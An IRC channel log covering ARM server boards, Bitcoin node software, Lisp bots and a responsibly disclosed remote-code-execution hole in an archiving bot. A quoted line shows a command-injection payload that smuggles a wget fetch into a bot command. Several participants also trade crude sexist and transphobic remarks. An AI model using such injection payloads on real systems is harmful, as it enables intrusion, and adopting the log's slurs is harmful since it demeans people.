douchebag: I appreciate that, feel free to reimburse it though haha
douchebag: Man I lol
lobbes: Anyways, archivetron's url snarf has been temporarily disabled for obvious reasons. Will resume once I plug these holes tonight
lobbes: I'll announce once back up
douchebag: I bet so many bots could be pwned with similar techniques
mircea_popescu: douchebag i'll get you a sever once the pizarro folk unwrap their heads enough to actually have one on offer. so you can tinker on gentoo, trb etc and get out of the "vps" bs hell.
douchebag: A physical serve ?!
douchebag: server*
asciilifeform: hey maybe he will be the test patient for the new arm boxen.
mircea_popescu: douchebag yeah.
mircea_popescu: asciilifeform i dunno he can arm... one thing at a time.
douchebag: Holy shit thanks!!
mircea_popescu: yeah, tell you what, i'll be as happy as you are once it's finally done.
asciilifeform: mircea_popescu: if all he needs is standard unix userland, no reason he couldn't arm.
mircea_popescu: what was on those, i forget ?
asciilifeform: the arm gentoo i am cooking up as we speak.
mircea_popescu: i meant hardware
douchebag: Well, I'm gonna grab a cigarette to aid with this excitement
asciilifeform: ROC-RK3328-CC ( currently building a kernel for it, without the 'evil' periphs )
asciilifeform: chinese thing, they publish schematic , even.
mircea_popescu: but ram hdd etc ?
asciilifeform: the unit i am testing ( will buy a few moar once i'm satisfied that it is usable ) came with 2G. there is a 4G supposedly also in production, but i was not able to obtain it
asciilifeform: hdd is a highspeed SD card , and can be of any size ; there is also a usb3 jack, 480MB/s; and a 1G/s nic.
mircea_popescu: ah so could actually run trb np
asciilifeform: indeed it could
asciilifeform: faster, in principle, even than zoolag
mircea_popescu: this is neat. ok, chuck the largest sd you can find in there an' consider it sold.
asciilifeform: first things first, gotta terraform it.
mircea_popescu: yeah.
asciilifeform: then will simply clone the gentoo for each new user ( or he can transmit a SD image , signed , and BingoBoingo will pump it in, plug in a board, and up an' running )
mircea_popescu: douchebag alf lands in the oriental republic sometime mid month ; you'll get your login then, an' your first task will be to get trb up on it ; and the tasks 2 throught 999 will be to have fun.
mircea_popescu: so clear your schedule 2nd half of april for it.
mircea_popescu: asciilifeform i like the model.
asciilifeform: the interesting bit is that these boxen draw ~2 - 5 watt. and are of the physical dimensions of a pack of cards.
asciilifeform: and (unlike e.g. 'raspberry') the full datashits and schems are published.
asciilifeform: chipset is a 'rockchip', i ported trb to it in 2015 iirc.
asciilifeform: (trb, buildroot-kernel, userlands)
asciilifeform: the other interesting pheature of this board is that it has no onboard flash. so nothing to sanitize aside from sdcard.
asciilifeform: ( also comes with audio and video but i do not need these and have not tried'em )
mircea_popescu: http://btcbase.org/log/2018-04-03#1792306 << ahahaha☝︎
a111: Logged on 2018-04-03 15:33 douchebag: ie: !!send $(wget http://site.com/lolz.txt)
mircea_popescu: http://btcbase.org/log/2018-04-03#1792317 << well conceivably for the same reason alf isn't bringing back phuctor, neh. cuz he doesn't as of yet have where to bring it back from!☝︎
a111: Logged on 2018-04-03 15:38 trinque: instead of whining about it, why not bring back said bot
mircea_popescu: http://btcbase.org/log/2018-04-03#1792321 << sounds like local knockoff. this thing only exists in cr, some local entrepreneur (in the proper sense of the term) made a supermarket that actually works.☝︎
a111: Logged on 2018-04-03 16:36 BingoBoingo: <mircea_popescu> so this upscale local market ("automercado") that stocks all the shit i buy and consequently got a multi-mn monthly account came up with the very dubious idea of running a promotion. one of those things where you get stickers with your receipt and then you fill a book ? in the terms of the master provisioneer, "they'll rue the day!". i think she's got like twenty of the things all lined up. << Here "automercados" are
mircea_popescu: http://btcbase.org/log/2018-04-03#1792327 << yeah, bringing mpex proxies back up is underway.☝︎
a111: Logged on 2018-04-03 16:44 douchebag: last time I tried looking there were so broken links
trinque: general point of "nobody wants your head bud, just move in a direction". I guess he had a health problem, which is rough.
lobbes: To wrap back to this discussion, I think I see your point. There's no real reason this craptop needs to deal with the user input at all. All I need it for is to download, store and parse shit download from archive.is. >> http://btcbase.org/log/2018-04-03#17924☝︎
a111: Logged on 2013-05-06 02:54 tiberiusiv: miami is not like NYC lol
mircea_popescu: http://btcbase.org/log/2018-04-03#1792332 << with both mouths, one would hope.☝︎
a111: Logged on 2018-04-03 16:57 BingoBoingo: In other news, the nose is mostly under control. South American cold still has my energy rather zapped. The Incan nurse however did apologize last night.
asciilifeform: mircea_popescu: s/meet/meat/g in footnote ii in yer latest article
mircea_popescu: lobbes the only important consideration here is that design is not a haphazard activity driven by occurence and circumstance. that's implementation. design is a deductive activity, it proceeds from first principles and does not break faith.
lobbes: Wat a111 misquote?
mircea_popescu: asciilifeform ty
lobbes: mircea_popescu makes sense
mircea_popescu: lobbes you lopped off a digit from the url ; it goes by #17924
lobbes: Ahh that's what happened
mircea_popescu: asciilifeform you know, your page is stale. it was already fixed in the latest version!
BingoBoingo: http://btcbase.org/log/2018-04-03#1792546 << Here it isn't a singluar entity running them. It's what they call gas stations without the gas pumps.☝︎
a111: Logged on 2018-04-03 18:37 mircea_popescu: http://btcbase.org/log/2018-04-03#1792321 << sounds like local knockoff. this thing only exists in cr, some local entrepreneur (in the proper sense of the term) made a supermarket that actually works.
douchebag: sounds good
mircea_popescu: BingoBoingo http://arc-anglerfish-arc2-prod-gruponacion.s3.amazonaws.com/public/24AKIANLPZAPNEEN7R4CXKBQIQ.jpg << looks like that ?
BingoBoingo: http://btcbase.org/log/2018-04-03#1792553 << Naturally and unnaturally.☝︎
a111: Logged on 2018-04-03 18:38 mircea_popescu: http://btcbase.org/log/2018-04-03#1792332 << with both mouths, one would hope.
BingoBoingo: !!up yangwao
deedbot: yangwao voiced for 30 minutes.
BingoBoingo: !!up yangwao_
deedbot: yangwao_ voiced for 30 minutes.
BingoBoingo: yangwao_: Who is your daddy and what does he do?
lobbes: mircea_popescu: But yeah, I need to think through my designs a bit better. Problem is I'm probably missing some crucial first principles.
mircea_popescu: lobbes on the positive side, this is how they were born in the first place, by people thinking about it. no revelation under the sun.
BingoBoingo: mircea_popescu: Yeah, the Ururuayan things with that string on their signage don't look like that.
lobbes: Perhaps I ought to go through all my existing designs, map them out, and then blog post em for forum critique.
mircea_popescu: lobbes can't hurt anything.
lobbes: True dat. Anyways I'll bbl. Thanks for allowing me to brain pick
mircea_popescu: http://btcbase.org/log/2018-04-03#1792337 << was that fedex'd ?☝︎
a111: Logged on 2018-04-03 17:05 BingoBoingo: asciilifeform: Remember, nothing of incredible value. I am still awaiting a birthday card from February.
BingoBoingo: mircea_popescu: Sent US mail, with "International Stamp" per the sender's description
mircea_popescu: worth trying a fedex type thing
BingoBoingo: Yeah
douchebag: later lobbes
asciilifeform: BingoBoingo, mircea_popescu : i learned today, that even shitazon ~will~ ship to BingoBoingoistan, BUT demands about 1 $ to every $ of item ordered , in 'import duty prepay'
douchebag: Do you guys know the specs of the server ?
ben_vulpes: mircea_popescu: is that free shipping to .uy?
asciilifeform: unfree
asciilifeform: (~on top of~ shipping)
deedbot: http://qntra.net/2018/04/venezuelas-education-minister-eat-less-if-you-want-to-see-food-in-supermarkets/ << Qntra - Venezuela's Education Minister: Eat Less If You Want To See Food In Supermarkets
mircea_popescu: ben_vulpes well yes.
mircea_popescu: douchebag it's above, http://btcbase.org/log/2018-04-03#1792521☝︎
a111: Logged on 2018-04-03 18:27 asciilifeform: ROC-RK3328-CC ( currently building a kernel for it, without the 'evil' periphs )
mircea_popescu: asciilifeform he was asking me not you lol.
asciilifeform: aaa
asciilifeform thought q was re shitazon-to-uy
douchebag: How would this compare to a raspberry pi ?
asciilifeform: douchebag: similar, but without the closed shitware iron
douchebag: Forsure
mircea_popescu: douchebag it's basically a very fast i/o low cpu power box.
asciilifeform: not even so low -- 4 x 1.4GHz 64bit
mircea_popescu: the republic's de facto moving towards hardware specialization, there's on one hand the very heavy cpu machines (of which sha miners are a subset, phuctor is another, and so on), and then the sort of thing like this, typified by a trb node machine.
mircea_popescu: asciilifeform yeah.
douchebag: Ooh interesting
douchebag: hahaha
douchebag: this is hilarious
douchebag: https://i.imgur.com/S18PzjG.png
douchebag: Just saw this come in
mircea_popescu: as you don't do a lot of numbers churning, it might be tghe perfect item for you. and if not, well, we see.
douchebag: Awesome
spyked: re arm box, /me was considering buying the arm64 olinuxino from teh olimex people. the rockchip board seems very similar (++ on the USB3 port), but I can't seem to find it in the EU.
asciilifeform: spyked: olimex lives in eu
BingoBoingo: douchebag: If you keep impressing and outgrow the ARM thing, there are worse places to vacation after dropping off a box than Uruguay. The best weather here runs December to February though.
mod6: iirc this dude would be coming out of eastern europe.
mod6: instead of the united retards
spyked: asciilifeform yeah I was talking about the ROC-RK3328-CC. it seems a tad beefier than the olimex counterpart. but otherwise yeah, olimex live very close to me, had a board delivered in ~2 days some months ago.
asciilifeform: funnily enuff , it takes typically 3d to usa !
asciilifeform: ( from bulgaria )
asciilifeform buys fairly often from olimex
mircea_popescu: spyked so you can get one from teh pizarro too!
mircea_popescu: mod6 wasn't he in chicago ?
BingoBoingo: Fucking Yankee from upstate
mod6: mircea_popescu: aha, iirc he said he's moving tho
douchebag: I will be in the United States in april
mircea_popescu: he is better than you rural hicks from southern ill!
douchebag: I'm leaving for eastern europe late may
mod6: douchebag: ah just through april tho?
mod6: ah, alright. will keep that in mind.
spyked: mircea_popescu: yeh I'm definitely considering that! the reason I've postponed getting an ARM board at all was the lack of a full-fledged SATA 3 port. I wanna get trb running on arm at some point among others.
mircea_popescu: missoury dunno even what chic is, while chicago had it long ago!
BingoBoingo: <mircea_popescu> he is better than you rural hicks from southern ill! << This is true. At his age I was solidly anti-productive.
mircea_popescu: spyked as described this item would actually make a great node ; whether the practice holds is to be seen in practice.
spyked: also, as a fun-fact: I tried running lispbots on an old first-gen raspberry pi, but it seems SBCL doesn't support threading on ARM (at least not ARMv6 and ARMv7). so I want to test that on ARM64.
asciilifeform: spyked: i found 1st gen raspi (entirely aside the q of closed shitware) to be ~unusable -- it shared a usb bus between nic (already slow) and disk
douchebag: Oh but yeah, until then - let me know if there are any IRC bots or web applications you want me to take a look at
spyked: eh, I ended up using it to host my IRC bouncer. at least it's good enough for that.
phf: spyked: i prefer ccl on low powered machines, the only parts of trinque's bot that rely on sbcl are one or two functions related to thread management
mircea_popescu: phf still though, losing out on threading on a quad machine is a little dumb.
phf: oh, right, that wasn't obvious from what i said, ccl supports multithreading on arms
mircea_popescu: a it does ?
spyked: oh cool
mircea_popescu: i suppose the question of lisp standardization, soon to be visited upon our fair republic, will be one helluva burning flame.
phf: i believe rainer joswig hosts his websites on some arm box with CL-HTTP on top of it
mircea_popescu: spyked a good move at this point i guess would be patching trinque 's bot to be all cll.
mircea_popescu: speaking of pantsuit refraction lulz, https://news.ycombinator.com/item?id=587045
ben_vulpes: mircea_popescu: thanks for extending the counteroffer, i'll take it. will you take payment in pizarro credits?
mircea_popescu: oh, and : lobbes other than the design review, consider lifting the whole of gutenberg into your archive ? the idiots already have a https that is broken, so far http only works but who knows how long.
mircea_popescu: ben_vulpes cash or bonds, though for the latter no actual discount was discussed in teh nsa boardroom. but i guess i'll go with .4 off the cuff and hope nobody throws gavels at me.
trinque uses ccl elsewhere, would glady sign that patch
ben_vulpes: mircea_popescu: works, i'll take it for bonds
mircea_popescu: epic contributions from "paul nakata" (hey, nobody on a stick but has a keybase key), some dork who "programs in cl every day" and the whole menagerie of "nobody told us to shut the fuck up like, ever"
mircea_popescu: ben_vulpes cool. that takes s.nsa pile to .9 if memory serves ?
ben_vulpes: correct you are
spyked: mircea_popescu, it's good timing, since I've been doing some reading ircbot code and comparing with my own implementation. I've actually been contemplating http://btcbase.org/log/2018-02-26#1786288 and rolling my own was not a wholly useless endeavour, i.e. http://trilema.com/2016/how-to-participate-in-the-affairs-of-the-most-serene-republic/#selection-322.0-322.5 so I'll document the whole thing on the blog.☝︎
a111: Logged on 2018-02-26 17:11 mircea_popescu: spyked the bot is a solved problem, genesis and all.
mircea_popescu: cool.
deedbot: http://qntra.net/2018/04/british-government-lab-admits-no-evidence-for-scandal-used-to-blow-up-diplomatic-relations-and-court-european-sympathy/ << Qntra - British Government Lab Admits No Evidence For Scandal Used To Blow Up Diplomatic Relations And Court European Sympathy
mircea_popescu: BingoBoingo mind redirecting www to . sometime too ?
asciilifeform: umm qntra down ??
BingoBoingo: mircea_popescu: Sure, I will take a look at it
mircea_popescu: try without the www
asciilifeform: or nm worx
phf: http://btcbase.org/log/2018-04-03#1792608 kek☝︎
a111: Logged on 2018-04-03 19:20 douchebag: https://i.imgur.com/S18PzjG.png
mircea_popescu: "in natural languages, we are used to context. indeed, contextual meaning is what makes natural languages natural. we have `list' as a verb, and we have `list' as a noun. we have `listless' as an adjective describing something (like a programming language) that does not have lists, and an adjective describing someone who is sort of permanently tired. when we need to disambiguate, we do so with more words."
mircea_popescu: this actually misses the all-important mechanism. "when we need to disambiguate, we add more words such as to contradict one of the two possible solutions the string could eval to"
mircea_popescu: whole fucking natural language is nothing beyhond "add aix^i terms until the damned P has only one real root."
mircea_popescu: and "default" is not a perfectly reasonable variable name holy shit. is this guy going to name his daughter "Cunt" ?
mircea_popescu: asciilifeform http://p.bvulpes.com/pastes/KLT6U/?raw=true
asciilifeform: mircea_popescu: yay! and yes.
asciilifeform: 2 per crate.
mircea_popescu: cool.
shinohai: > Bans gun videos, gets live-action shooting instead http://archive.is/NyMvo
trinque: shinohai: https://archive.is/TgtPb << breitbart didn't neglect the "wearing a headscarf" deets
shinohai: Allah snackbar!
asciilifeform: 'We are seeing @YouTube employees being brought out with hands up!' << lol
trinque: they didn't offer up their assholes quick enough?
mircea_popescu: heh
deedbot: http://trilema.com/2018/on-namespaces/ << Trilema - On namespaces
douchebag: glad work is over
douchebag: Fucking had this dude from work looking over my shoulder
douchebag: asking questions about everything I type in my terminal
mircea_popescu: what sort of chickenfarm do you work in lol
douchebag: Most of the people there are alright
douchebag: This is just new kid who just likes asking too many questions
asciilifeform: damn i had nfi douchebag were chained to an oar. suxx.
douchebag: and doesn't understand it's considered disrespectful to stare at someone elses computer screen
douchebag: nfi?
mircea_popescu: no fucking idea
douchebag: ahh
douchebag: Yeah no it was fine most of the day, this kid would just get out of his seat and stand behind me and start staring at what I was doing and asked a bunch of questions
douchebag: how about that shooting though
douchebag: so much for mass shooting being a men only sort of deal
asciilifeform: bbut lead is banned in californistan!111
asciilifeform: what nao, ban tits ?
douchebag: lolol
douchebag: asciilifeform: Only womens tits
douchebag: Tranny tits are a-okay in California
mircea_popescu: basically "liberation" and "4th wave feminism" consists of a bunch of male dweebs with no utility that nobody wants appropriating feminity and taking over boobs.
mircea_popescu: ain't enough they kicked women out of the last well paying job available to them (nursing), now they're gonna steal the tits, too ?
asciilifeform: lol waitasec this was a trans-postal?
mircea_popescu: nfi, i was discussing the "women in tech" trend generally.
asciilifeform: aa
mircea_popescu: there's by now a large and visible class of dweebs who considered the "should i learn github or get boobs" dilemma and came out with "better get boobs -- govt pays for it."
douchebag: Men need to stop acting like women and women need to stop acting like men, imo
mircea_popescu: men can't stop acting like women -- there's really nothing else for them.
asciilifeform: in other 'holyfuq, chinesium', 1500000 (!) baud default uart.
asciilifeform in fact was not able to find a single usb uart that will reliably rx it: had to use logic analyzer
asciilifeform did in the end find one : ye olde ft232
shinohai: http://therealbitcoin.org/ml/btc-dev/2018-April/000295.html << ty jurov for handling donation, cheers! [~]D
mod6: Hey, thanks for your donation shinohai!
shinohai: cheers as well! o7
douchebag: just buy the fucking water filters already
lobbes: oy, yup this is the spoofed user agent that the phantomjs portion of the process was using. RCE was happening both at the bash level AND via the headless browser.. I got poked in several orifices >> http://btcbase.org/log/2018-04-03#1792665☝︎
a111: Logged on 2018-04-03 19:52 a111: Logged on 2018-04-03 19:20 douchebag: https://i.imgur.com/S18PzjG.png
lobbes: !!v B7975B7CA5C064DEC53DCE43D14C35C0F1D735FB0F849EE418B922F3A81502F5
deedbot: lobbes rated douchebag 2 << exploited several security holes in my archive process, but was nice enough to tell me rather than pwn me
douchebag: <3
douchebag: lobbes: Mind sharing the source code? I could perhaps help you identify further exploits
douchebag: i wonder
douchebag: !!ratings douchebag
deedbot: http://p.bvulpes.com/pastes/AhSME/?raw=true
douchebag: !!reputation douchebag
deedbot: http://p.bvulpes.com/pastes/xgnGJ/?raw=true
lobbes: my plan tonight is to go through and map out whole process (I'll probably tar up my code after I attempt to sanitize inputs), will bake a blog post exposing my naivete to forum at large
lobbes: I gotta learn somehow
phf: mircea_popescu: "Unlike obligate coprophagiacs, subsistence hunters could not be stone age fucktards, but for whatever reason opt not to." is there a double not in there?
shinohai: dont be so hard on self, supbybot/limnoria is broken so beautifully anyway
douchebag: lobbes: I'll help you make your bot more secure
lobbes: ty douchebag! much appreciated
lobbes: and shinohai, as much as I'd like to blame this on supybot, this one is all me (the exploited code was all brewed by yours truly)
douchebag: Just tell me essentially what it is you're trying to do, what you have already tried, and then I'll suggest you how to write it properly
shinohai: O.o nb lobbes
lobbes: douchebag well, it is very convoluted atm. besides, I'd rather there be a static page I can point to than just barfing it in the logs
lobbes: I agree this needs archiving (I'm currently working off their version of kritik der reinen vernunft as a german study aid). However, unlike kibo.com I would wager the entirety of gutenberg is much much larger. I'd prolly need moar storage than the ~200gb ssd on the dedicated home craptop I'm currently using (but maybe not) >> http://btcbase.org/log/2018-04-03#1792648☝︎
a111: Logged on 2018-04-03 19:41 mircea_popescu: oh, and : lobbes other than the design review, consider lifting the whole of gutenberg into your archive ? the idiots already have a https that is broken, so far http only works but who knows how long.
lobbes bbl food
douchebag: Forsure, I'm rather experience with application design from a security prespective so just let me know if you have any questions
douchebag: Just make sure a problem like that doesn't occur again. Remote code execution is just as bad as it can get
trinque: heh, meanwhile, all of sexual reproduction is based on getting those RCEs
douchebag: trinque: That's true
douchebag: and I'll tell you why, when working for a company doing a security audit - you will get paid the most for RCE. Women love money, and that money can be used to help take care of the children
douchebag: PWN BOXES 2 HELP THE CHILDREN
trinque: why, is that's what sperm do, my man.
douchebag: eventually
trinque: http://btcbase.org/log/2016-09-17#1543393 << thread☝︎
a111: Logged on 2016-09-17 02:55 mircea_popescu: trinque fancy that, you had to have someone tell you! nature teaches by example, you stick more data into woman each time than you ever did into all machines you ever touched. yet...
douchebag: trinque: What other bots are in here besides lobbes and deedbot
asciilifeform: pehbot !
douchebag: whats the syntax
trinque: ^ and mimisbrunnr
asciilifeform: !!up pehbot
deedbot: pehbot voiced for 30 minutes.
douchebag: also syntax for mimisbrunnr
asciilifeform: !A help
pehbot: asciilifeform: I am PehBot. See also http://www.loper-os.org/?p=2051 . My Width is currently fixed to 256 and Height to 32.
trinque: I think mimisbrunnr only quotes log-lines; it's ben_vulpes'
asciilifeform: !#s pehbot
a111: 98 results for "pehbot", http://btcbase.org/log-search?q=pehbot
asciilifeform: ^ see also.